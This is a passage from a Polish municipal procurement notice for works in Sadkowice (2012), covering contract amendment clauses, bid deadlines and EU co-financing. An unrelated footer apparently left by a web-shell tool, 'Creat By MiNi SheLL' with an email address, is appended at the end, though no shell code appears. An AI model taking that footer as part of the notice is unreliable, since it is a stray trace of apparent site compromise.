2)	zmiany spowodowane są nieprzewidzianymi warunkami realizacji, tj. warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: wykopaliska archeologiczne, niewypały i niewybuchy, niezinwentaryzowane lub błędnie zinwentaryzowane obiekty budowlane;
3)	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności   wstrzymanie robót przez Zamawiającego.
d) w przypadku rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy;   Zmiany mogą dotyczyć zmniejszenia zakresu wykonywanych prac, i w związku z tym zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót, z których zamawiający zrezygnował, obliczonych na podst. kosztorysu ofertowego złożonego wraz z ofertą przez Wykonawcę.
e) za względu na konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
f) ze względu na konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.

Zmiany w treści  umowy będą dokonywane wyłącznie w formie pisemnego aneksu.
Wszystkie powyższe postanowienia niniejszego punktu-6 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminasadkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sadkowicach
Sadkowice 129 A
96-206 Sadkowice
Pokój nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 11:00, miejsce: Urząd Gminy w Sadkowicach
Sadkowice 129 A
96-206 Sadkowice
Pokój nr 1 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie jest współfinansowane w ramach działania  321 Podstawowe usługi dla gospodarki i ludności wiejskiej objętego Programem Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com